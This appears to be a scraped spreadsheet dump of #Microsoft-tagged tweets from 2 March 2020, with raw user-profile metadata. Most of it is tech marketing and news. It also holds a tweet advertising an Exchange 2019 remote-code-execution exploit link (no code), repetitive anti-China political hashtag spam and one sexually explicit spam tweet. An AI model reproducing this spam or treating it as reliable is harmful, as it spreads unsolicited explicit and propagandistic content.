    <t>{'id': 1911046226, 'id_str': '1911046226', 'name': 'UrBizEdge', 'screen_name': 'urBizEdge', 'location': 'Nigeria', 'description': "We are Nigeria's leading business data analysis firm. Visit https://t.co/7abqHS26wt to get some of our training resources for free.", 'url': 'http://t.co/NAEZOd8Psi', 'entities': {'url': {'urls': [{'url': 'http://t.co/NAEZOd8Psi', 'expanded_url': 'http://www.urbizedge.com', 'display_url': 'urbizedge.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/7abqHS26wt', 'expanded_url': 'http://www.urbizedge.com/tutorials', 'display_url': 'urbizedge.com/tutorials', 'indices': [60, 83]}]}}, 'protected': False, 'followers_count': 148, 'friends_count': 299, 'listed_count': 13, 'created_at': 'Fri Sep 27 12:43:43 +0000 2013', 'favourites_count': 94, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2534,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'http://pbs.twimg.com/profile_images/1093454538126835712/lAhre3Ui_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1093454538126835712/lAhre3Ui_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1911046226/1551692793',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</si>
  <si>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#Mondaymotivation
To Improve your business productivity;
Visit: https://t.co/0nlArE2rDb
Or
Call: 0700ANALYTICS / 01-6311885 for more information
.
#urbizedge #mondaythoughts #monday #excel #microsoftexceltraining #microsoft #powerbi #financialmodeling #March https://t.co/XJUAFbagkY</t>
  </si>
  <si>
    <t>{'id': 1033661752263815169, 'id_str': '1033661752263815169', 'name': 'Nigeria Market Data', 'screen_name': 'market_nigeria', 'location': 'Nigeria', 'description': 'All the financial market and macro-economic data you need.', 'url': 'https://t.co/IIu8aZoCem', 'entities': {'url': {'urls': [{'url': 'https://t.co/IIu8aZoCem', 'expanded_url': 'http://www.nigeriamarketdata.com', 'display_url': 'nigeriamarketdata.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 10, 'friends_count': 1, 'listed_count': 0, 'created_at': 'Sun Aug 26 10:25:41 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 365, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1033662949699854337/fzmWklo-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1033662949699854337/fzmWklo-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1033661752263815169/1535279487',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</si>
  <si>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#Mondaymotivation
To Improve your business productivity;
Visit: https://t.co/XoIHkj56Vz
Or
Call: 0700ANALYTICS / 01-6311885 for more information
.
#urbizedge #mondaythoughts #monday #excel #microsoftexceltraining #microsoft #powerbi #financialmodeling #March https://t.co/UKhTrFQ0Y4</t>
  </si>
  <si>
    <t>{'id': 29677340, 'id_str': '29677340', 'name': 'Michael Olafusi', 'screen_name': 'olafusimichael', 'location': 'Lagos', 'description': 'Microsoft #Excel #MVP, trainer and Consultant.', 'url': 'https://t.co/lbPjMKXbtp', 'entities': {'url': {'urls': [{'url': 'https://t.co/lbPjMKXbtp', 'expanded_url': 'http://www.olafusimichael.com', 'display_url': 'olafusimichael.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1577, 'friends_count': 1510, 'listed_count': 90, 'created_at': 'Wed Apr 08 08:51:09 +0000 2009', 'favourites_count': 26, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14474, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '97F858', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/867438381525069838/euaaE8KL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/867438381525069838/euaaE8KL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/29677340/1448873903', 'profile_link_color': '72ADD7', 'profile_sidebar_border_color': 'FCF9F9', 'profile_sidebar_fill_color': 'F7B39E', 'profile_text_color': '3C3940', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 07:00:15 +0000 2020</t>
  </si>
  <si>
    <t>#0daytoday #Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution #Exploit #RCE https://t.co/rg8074UuSv</t>
  </si>
  <si>
    <t>Mon Mar 02 07:00:10 +0000 2020</t>
  </si>
  <si>
    <t>#Apple announced that itll stop allowing HTTPS certificates on #Safari browser with more than 13 months of validity. #GitHub, #Microsoft .com use a two-year certificate. @digicert has issued a memo about the new policy  https://t.co/8VmsoLV9dk</t>
  </si>
  <si>
    <t>{'id': 103017702, 'id_str': '103017702', 'name': 'Dmitriy Khomutov', 'screen_name': 'Khomutoff', 'location': 'Seattle, WA', 'description': 'Have head in the Clouds @Microsoft #Azure in the World of Friendly Computing. #NoLIDARneeded #TeslaAutopilot technology supporter, Pro-FairSupercharge', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 72, 'friends_count': 124, 'listed_count': 1, 'created_at': 'Fri Jan 08 15:57:33 +0000 2010', 'favourites_count': 6172, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1038,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'http://pbs.twimg.com/profile_images/3575517840/bfab7608de71b3cb83e299c379046635_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3575517840/bfab7608de71b3cb83e299c379046635_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/103017702/1559366545',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</si>
  <si>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06:58:02 +0000 2020</t>
  </si>
  <si>
    <t>Free #Webinar - Introduction to #SQLServer Query Tuning
N.America, March 4th: https://t.co/cUxZS4Jkd4
EMEA, March 5th: https://t.co/W2S8kS1EhB
#free #Performance #Tuning #tsql #sqldba #microsoft #madeiradata https://t.co/Nt1m2YGa25</t>
  </si>
  <si>
    <t>Mon Mar 02 06:56:03 +0000 2020</t>
  </si>
  <si>
    <t>Another video from Microsoft Azure YouTube page, Identity Management, information on password management and on-prem protection, link below.
#Microsoft #Azure #Cloud #CloudComputing #AzureActiveDirectory
https://t.co/2GrJHQwdio</t>
  </si>
  <si>
    <t>{'id': 1669064869, 'id_str': '1669064869', 'name': 'DataPrimeCloud', 'screen_name': 'DataPrimeCloud', 'location': '', 'description': 'Big Data and Cloud Computing  https://t.co/w6TkXcOTKe', 'url': 'http://t.co/ORA8JXcIJQ', 'entities': {'url': {'urls': [{'url': 'http://t.co/ORA8JXcIJQ', 'expanded_url': 'http://www.DataPrimeCloud.com', 'display_url': 'DataPrimeCloud.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/w6TkXcOTKe', 'expanded_url': 'http://dataprimecloud.com/drupal8', 'display_url': 'dataprimecloud.com/drupal8', 'indices': [30, 53]}]}}, 'protected': False, 'followers_count': 600, 'friends_count': 1401, 'listed_count': 391, 'created_at': 'Wed Aug 14 00:00:42 +0000 2013', 'favourites_count': 2929, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5433,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'http://pbs.twimg.com/profile_images/431258475868344320/W1j-GBXx_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/431258475868344320/W1j-GBXx_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1669064869/1390898437',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</si>
  <si>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06:42:30 +0000 2020</t>
  </si>
  <si>
    <t>Modernize your existing legacy applications &amp;amp; future-proof your business. Contact us for an assessment and application modernization roadmap. https://t.co/uxyprSTzDb #ApplicationModernization #DigitalTransformation #CloudComputing #cloudmigration #cloud #Microsoft #aws20 #Azure https://t.co/C3WwGnCtZd</t>
  </si>
  <si>
    <t>{'id': 570876184, 'id_str': '570876184', 'name': 'Cloud-Kinetics', 'screen_name': 'cloud_kinetics', 'location': 'Singapore', 'description': 'Digital Transformation', 'url': 'http://t.co/OvsmcFwvwg', 'entities': {'url': {'urls': [{'url': 'http://t.co/OvsmcFwvwg', 'expanded_url': 'http://www.cloud-kinetics.com', 'display_url': 'cloud-kinetics.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 139, 'friends_count': 846, 'listed_count': 5, 'created_at': 'Fri May 04 14:26:20 +0000 2012', 'favourites_count': 21, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 274,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'http://pbs.twimg.com/profile_images/1140508317137031168/fASvNR5E_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1140508317137031168/fASvNR5E_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/570876184/1560753394',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</si>
  <si>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Mon Mar 02 06:42:24 +0000 2020</t>
  </si>
  <si>
    <t>Today, many #MNCs are looking for experts who can work on #powerbi . This ultimate list of Power BI #interview #questions  2020 will help you gain expertise in Power BI and clear #Interviews interviews successfully. at https://t.co/Zygz3QiisT
#Microsoft #BusinessIntelligence https://t.co/k0sdeFkRLJ</t>
  </si>
  <si>
    <t>Mon Mar 02 06:35:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is discontinuing #Cortana consumer skills starting with #Windows10 20H1 | ZDNet https://t.co/EObpA2cFPZ https://t.co/KOpl1q69wj</t>
  </si>
  <si>
    <t>Mon Mar 02 06:34:35 +0000 2020</t>
  </si>
  <si>
    <t>Questioning the China communist Partys message.
#CoronaVirus #WuhanCoronavirusOutbreak #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping 
https://t.co/F2TUdhE3wS</t>
  </si>
  <si>
    <t>Mon Mar 02 06:34:02 +0000 2020</t>
  </si>
  <si>
    <t>Want know how Wizdom works with Modern SharePoint?
Check out the white paper!
#sharepointmodern #microsoft #digitalworkplace #intranet #employeeengagement #collaboration
https://t.co/SQdLisHGKl https://t.co/PnYwOSuELq</t>
  </si>
  <si>
    <t>{'id': 135509896, 'id_str': '135509896', 'name': 'Wizdom Intranet', 'screen_name': 'wizdom_intranet', 'location': 'Copenhagen', 'description': 'Wise Up your workplace with intelligent solutions for the digital workplace and MS Teams. Give your team an edge with a state-of-the-art platform.', 'url': 'http://t.co/g8ozymULln', 'entities': {'url': {'urls': [{'url': 'http://t.co/g8ozymULln', 'expanded_url': 'http://www.wizdom-intranet.com', 'display_url': 'wizdom-intranet.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 306, 'friends_count': 124, 'listed_count': 44, 'created_at': 'Wed Apr 21 14:11:56 +0000 2010', 'favourites_count': 664, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 623,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'http://pbs.twimg.com/profile_images/810809961576091648/PCkObjB0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/810809961576091648/PCkObjB0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/135509896/1576586840',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</si>
  <si>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06:28:59 +0000 2020</t>
  </si>
  <si>
    <t>Among ALL the lies you have heard, this is the BEST.
#CoronaVirus #WuhanCoronavirusOutbreak #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping 
https://t.co/IQbyxCVET7</t>
  </si>
  <si>
    <t>Mon Mar 02 06:25:34 +0000 2020</t>
  </si>
  <si>
    <t>Stopping the Coronavirus is not the Cultural Revolution.
#CoronaVirus #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping 
https://t.co/kTCTQQyVR4 via @financialtimes</t>
  </si>
  <si>
    <t>Mon Mar 02 06:23:23 +0000 2020</t>
  </si>
  <si>
    <t>By powering Dynamics 365 with AI, marketers could generate more accurate social insights and take the customer engagement to the next level, bringing greater business agility and ROI... https://t.co/GKgVOpRloV
#Microsoft #Dynamics365 #AI #ArtificialIntelligence #D365 https://t.co/bjWbWxWhzh</t>
  </si>
  <si>
    <t>{'id': 103514094, 'id_str': '103514094', 'name': 'Raybiztech', 'screen_name': 'Raybiztech', 'location': 'USA | Australia | India | Canada', 'description': 'Celebrating 11 Years in Business! Leading IT Solutions and Services Provider. #CMS #CRM #Kentico #Sitecore #Dynamics365 #DataAnalytics #Boomi #AI #DeepLearning', 'url': 'https://t.co/6LC1C5wDua', 'entities': {'url': {'urls': [{'url': 'https://t.co/6LC1C5wDua', 'expanded_url': 'https://www.raybiztech.com', 'display_url': 'raybiztech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2003, 'friends_count': 4820, 'listed_count': 113, 'created_at': 'Sun Jan 10 07:53:55 +0000 2010', 'favourites_count': 893, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3184,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'http://pbs.twimg.com/profile_images/1078175007241457664/pqHa3Hjg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1078175007241457664/pqHa3Hjg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/103514094/1521013212',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</si>
  <si>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06:22:39 +0000 2020</t>
  </si>
  <si>
    <t>Thinking about China as a Supply Chain?
#CoronaVirus #WuhanCoronavirusOutbreak #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping
https://t.co/JqgSXteZAh</t>
  </si>
  <si>
    <t>Mon Mar 02 06:18:10 +0000 2020</t>
  </si>
  <si>
    <t>@XHNews Xi Lied.
#CoronaVirus #WuhanCoronavirusOutbreak #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping https://t.co/L5rAV5Y0l4</t>
  </si>
  <si>
    <t>Mon Mar 02 06:15:59 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10 single language WTF is this? @BillGates @MicrosoftTR @MicrosoftYardim @Microsoft @Windows #Microsoft  #BillGates  single language part is OK but, at least we should change the language by deleting current language! This is one of the most stupid thing I've ever seen!</t>
  </si>
  <si>
    <t>{'id': 1011530527269105664, 'id_str': '1011530527269105664', 'name': 'Serkan TarakcÄ±', 'screen_name': 'serkan_tarakc', 'location': 'Ä°zmir, TÃ¼rkiye', 'description': "-Bilgisayar MÃ¼hendisi\n\n-Ä°zmir Ekonomi Ãœniversitesi '16\n\n-instagram.com/serkantarakci.st\n\n(Twitter'Ä± genellikle ona buna atar yapmak iÃ§in kullanÄ±rÄ±m.)", 'url': 'https://t.co/4JWsQjn6O9', 'entities': {'url': {'urls': [{'url': 'https://t.co/4JWsQjn6O9', 'expanded_url': 'https://serkansoftware.wordpress.com', 'display_url': 'serkansoftware.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 37, 'friends_count': 65, 'listed_count': 0, 'created_at': 'Tue Jun 26 08:44:05 +0000 2018', 'favourites_count': 225, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 216, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1070020914690097152/RDQFsp5B_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1070020914690097152/RDQFsp5B_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1011530527269105664/1531641183',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</si>
  <si>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06:15:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft has announced the retirement of the MCSA, MCSD, MCSE certifications; with continued investment to role-based certifications
Read more: https://t.co/GGqVjO3sli
#Microsoft #RoleBased #MCSA #MCSE #MCSD #MicrosoftEducation #ITTraining #NewHorizonsPrague https://t.co/AKpCy3pCHC</t>
  </si>
  <si>
    <t>Mon Mar 02 06:12:00 +0000 2020</t>
  </si>
  <si>
    <t>@Azure Exam AZ-300 Tip:
#microsoft #microsoftazure #Azure #LinkedInlearning 
https://t.co/7LaypOyshu</t>
  </si>
  <si>
    <t>Mon Mar 02 06:09:17 +0000 2020</t>
  </si>
  <si>
    <t>Thinking about future businesses with China?
#CoronaVirus #WuhanCoronavirusOutbreak #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping 
https://t.co/7nxWibNHva</t>
  </si>
  <si>
    <t>Mon Mar 02 06:08:01 +0000 2020</t>
  </si>
  <si>
    <t>How-To Geek: How to Play Microsoft Edges Secret Surfing Game - https://t.co/j5XTBRTh6T #Microsoft #browsers #game</t>
  </si>
  <si>
    <t>{'id': 6979102, 'id_str': '6979102', 'name': 'Tara Calishain', 'screen_name': 'ResearchBuzz', 'location': '', 'description': 'Obsessed with search engines, info collections, and databases since forever. News and resources covering same since 1998. Wrote a stack of books. Say hi.', 'url': 'http://t.co/N8gqhQKHJ5', 'entities': {'url': {'urls': [{'url': 'http://t.co/N8gqhQKHJ5', 'expanded_url': 'http://www.researchbuzz.com', 'display_url': 'researchbuzz.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5549, 'friends_count': 3406, 'listed_count': 594, 'created_at': 'Wed Jun 20 22:25:01 +0000 2007', 'favourites_count': 5245, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 58334,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'http://pbs.twimg.com/profile_images/572069625517453312/0zTcuSnw_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/572069625517453312/0zTcuSnw_normal.png', 'profile_link_color': '243A8F', 'profile_sidebar_border_color': '87BC44', 'profile_sidebar_fill_color': 'E0FF92', 'profile_text_color': '000000', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 06:07:15 +0000 2020</t>
  </si>
  <si>
    <t>SolzRBM is a unique RTO management software for Australia that helps you automate all your vital processes across functions of student recruitment, academic operations, compliance, and reporting.
https://t.co/8obim20z0q
#SolzRBM #MSDynCRM #Microsoft #Soluzione #dynamics365 https://t.co/SsVz75BzYS</t>
  </si>
  <si>
    <t>Mon Mar 02 06:06:38 +0000 2020</t>
  </si>
  <si>
    <t>SolzRBM is a unique RTO management software for Australia that helps you automate all your vital processes across functions of student recruitment, academic operations, compliance, and reporting.
https://t.co/AUd1nrieTb
#SolzRBM #MSDynCRM #Microsoft #Soluzione #dynamics365 https://t.co/sPyjDJvhih</t>
  </si>
  <si>
    <t>Mon Mar 02 06:05:55 +0000 2020</t>
  </si>
  <si>
    <t>For #SMBs, moving to the #cloud is proven to help achieve greater profit margins and ROI. Check out this informative infographic to see why it's a game changer.      #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/75NhmJtXqP</t>
  </si>
  <si>
    <t>{'id': 120790459, 'id_str': '120790459', 'name': 'CETAS', 'screen_name': 'cetastech', 'location': 'Chennai | Bangalore | Dubai', 'description': 'Gold Partner for #MSDynERP | #Dynamics365 #DynamicsNAV #BusinessCentral #PowerBI #LSRetail #Cloud #Azure | Global Implementation &amp; Support | sales@cetastech.com', 'url': 'https://t.co/i7TXAlWOtm', 'entities': {'url': {'urls': [{'url': 'https://t.co/i7TXAlWOtm', 'expanded_url': 'http://www.cetastech.com', 'display_url': 'cetastech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 224, 'friends_count': 150, 'listed_count': 3, 'created_at': 'Sun Mar 07 15:18:22 +0000 2010', 'favourites_count': 85, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 469,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'http://pbs.twimg.com/profile_images/1163391661772169217/sRygbOtC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1163391661772169217/sRygbOtC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/120790459/1580984535',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</si>
  <si>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06:05:15 +0000 2020</t>
  </si>
  <si>
    <t>Comrade Xi,
You lied once and ALL your truths become questionable.
#CoronaVirus #WuhanCoronavirusOutbreak #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping
https://t.co/JVKSU7JFDi</t>
  </si>
  <si>
    <t>Mon Mar 02 06:04:42 +0000 2020</t>
  </si>
  <si>
    <t>I am very happy to announce that we have a new #MVP (Most Valuable Professional) in our #microsoft community !
This award recognizes exceptional community leadership to the technology experts.
Congratulations @BenniDeJagere !! https://t.co/GCXsJJoDtG</t>
  </si>
  <si>
    <t>{'id': 297954957, 'id_str': '297954957', 'name': 'Dominique Gire', 'screen_name': 'dominique_gire', 'location': 'Madrid, Comunidad de Madrid', 'description': 'Microsoft Business Applications Director', 'url': 'https://t.co/YwGWokpFVc', 'entities': {'url': {'urls': [{'url': 'https://t.co/YwGWokpFVc', 'expanded_url': 'http://www.gfi.world', 'display_url': 'gfi.world', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 111, 'friends_count': 16, 'listed_count': 14, 'created_at': 'Fri May 13 12:17:17 +0000 2011', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 461,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'http://pbs.twimg.com/profile_images/1076651764261228544/OKPuhC2k_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1076651764261228544/OKPuhC2k_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/297954957/1568181623',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</si>
  <si>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06:04:08 +0000 2020</t>
  </si>
  <si>
    <t>I am a fan of naked football #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 06:01:22 +0000 2020</t>
  </si>
  <si>
    <t>Cloud Infrastructure is a great tool but only if used correctly. This blog series explains how to determine a Azure VM workload and how to deploy it #Microsoft #HyperV https://t.co/etMHKOeFaQ</t>
  </si>
  <si>
    <t>Mon Mar 02 06:00:39 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that 83% of employees depend on technology to work together? The landscape of teamwork is changing--but we've got you covered. Check out this infographic to see how you can benefit from #Teamworksolutions from #Microsoft. https://t.co/jCS5Sb9XrI</t>
  </si>
  <si>
    <t>{'id': 352260841, 'id_str': '352260841', 'name': 'GKM2', 'screen_name': 'GKM2Solutions', 'location': 'Sydney', 'description': 'Where business &amp; technology converge. A boutique Microsoft Silver Partner helping enterprises transform their business with Microsoft Cloud Technologies', 'url': 'https://t.co/pkdl35PTTf', 'entities': {'url': {'urls': [{'url': 'https://t.co/pkdl35PTTf', 'expanded_url': 'https://www.gkm2.com.au', 'display_url': 'gkm2.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 86, 'friends_count': 123, 'listed_count': 8, 'created_at': 'Wed Aug 10 11:08:05 +0000 2011', 'favourites_count': 15, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 276,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'http://pbs.twimg.com/profile_images/688125154145124353/hHE5GjYK_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/688125154145124353/hHE5GjYK_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/352260841/1508277876',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</si>
  <si>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06:00:04 +0000 2020</t>
  </si>
  <si>
    <t>Closing the #internet access gap... #Microsoft #Rural #Broadband @MSFTIssues https://t.co/K8VbHqmkVE #MSFTAdvocate</t>
  </si>
  <si>
    <t>Mon Mar 02 05:49:15 +0000 2020</t>
  </si>
  <si>
    <t>Early start this morning. Off to sunny Peterborough to talk about all things #Microsoft #Cloud</t>
  </si>
  <si>
    <t>{'id': 28831262, 'id_str': '28831262', 'name': 'Anthony Mashford', 'screen_name': 'anthonymashford', 'location': 'Southampton, England', 'description': 'Cloud Solutions Architect | #Azure | @CDW_UK | #Biker | Ex-RM | Will work for #Biscuits | Views &amp; opinions are mine', 'url': 'https://t.co/kViQmYbHJK', 'entities': {'url': {'urls': [{'url': 'https://t.co/kViQmYbHJK', 'expanded_url': 'http://blog.mashfords.com', 'display_url': 'blog.mashfords.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 557, 'friends_count': 531, 'listed_count': 23, 'created_at': 'Sat Apr 04 17:20:32 +0000 2009', 'favourites_count': 4815, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5790,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'http://pbs.twimg.com/profile_images/1200768006038736896/1qoRK4ui_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1200768006038736896/1qoRK4ui_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/28831262/1553179477',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</si>
  <si>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05:47:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Surface Duos brand new Peek feature leaked (video) https://t.co/cAGC4WKZ37</t>
  </si>
  <si>
    <t>Mon Mar 02 05:44:54 +0000 2020</t>
  </si>
  <si>
    <t>Retweet if you want my perfect fat ass sat on my face #Palmdale   #videos #microsoft https://t.co/f8jXCGhunV</t>
  </si>
  <si>
    <t>{'id': 1234144579131203590, 'id_str': '1234144579131203590', 'name': 'Jennifer Howell', 'screen_name': 'stakobridot', 'location': 'Fort Lauderdale, USA', 'description': 'Love is a fruit in season at all times, and within reach of every hand', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 34, 'listed_count': 0, 'created_at': 'Sun Mar 01 15:52:57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'http://pbs.twimg.com/profile_images/1234157560351117313/7J8SR0yK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234157560351117313/7J8SR0yK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234144579131203590/1583081095',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</si>
  <si>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05:43:48 +0000 2020</t>
  </si>
  <si>
    <t>Want to create solid web applications for your business? 
Looking for the top #Microsoft #webappdevelopment company in Malaysia?
Reach out to Openwave, the top #DotNET company and build a first-class web app! https://t.co/PMTwwje54J
Check our portfolio- https://t.co/KcaTxlcApa https://t.co/S5Gsu95YRL</t>
  </si>
  <si>
    <t>Mon Mar 02 05:43:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Edge for #Android gets Tracking Prevention and Contextual Search with latest update https://t.co/oongdp3CCT</t>
  </si>
  <si>
    <t>Mon Mar 02 05:41:34 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Surface Duo Tipped To Unveil Ahead Of Schedule https://t.co/kJlrjUJ9Q2
#Android, #news, #smartphones, #like4like, #likeforlike, #follow4follow #techblog, #technews #futuretechnology #Microsoft #socialmedia #innovation #Phone #5G #gadgets #engineering #techhacks #media</t>
  </si>
  <si>
    <t>{'id': 734619370991804416, 'id_str': '734619370991804416', 'name': 'TechnoBugg', 'screen_name': 'TechnobuggTweet', 'location': 'New Delhi, India', 'description': "We will gather all the latest stuffs from tech world, Social Networking, How To's, Softwares, Reviews, Gadgets, Tips &amp; Tricks", 'url': 'https://t.co/gwxbMJ9Ioi', 'entities': {'url': {'urls': [{'url': 'https://t.co/gwxbMJ9Ioi', 'expanded_url': 'http://www.technobugg.com/', 'display_url': 'technobugg.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 82, 'friends_count': 1, 'listed_count': 2, 'created_at': 'Mon May 23 05:38:01 +0000 2016', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7264,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'http://pbs.twimg.com/profile_images/825363956256604160/mM0V50rx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/825363956256604160/mM0V50rx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/734619370991804416/1485612008', 'profile_link_color': 'AE1182',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</si>
  <si>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05:41:31 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Outlook for #Android now lets you draw on photos and documents from within the app https://t.co/GWMFsRefWd</t>
  </si>
  <si>
    <t>Mon Mar 02 05:41:08 +0000 2020</t>
  </si>
  <si>
    <t>#GameCore based test game show up in the #Microsoft Store https://t.co/DQAqQcnImO</t>
  </si>
  <si>
    <t>Mon Mar 02 05:39:54 +0000 2020</t>
  </si>
  <si>
    <t>Modern Classroom Technology from Microsoft
Read more: https://t.co/TDUcHcOsrN.../education-sector
#tmrc #microsoft #dynamics #microsoftdynamics365 #microsoftforeducation #D365 #azure #microsoftteams #powerapps #azureforeducation #schools #universities #colleges #educationsector https://t.co/snfR9TsbeS</t>
  </si>
  <si>
    <t>Mon Mar 02 05:38:10 +0000 2020</t>
  </si>
  <si>
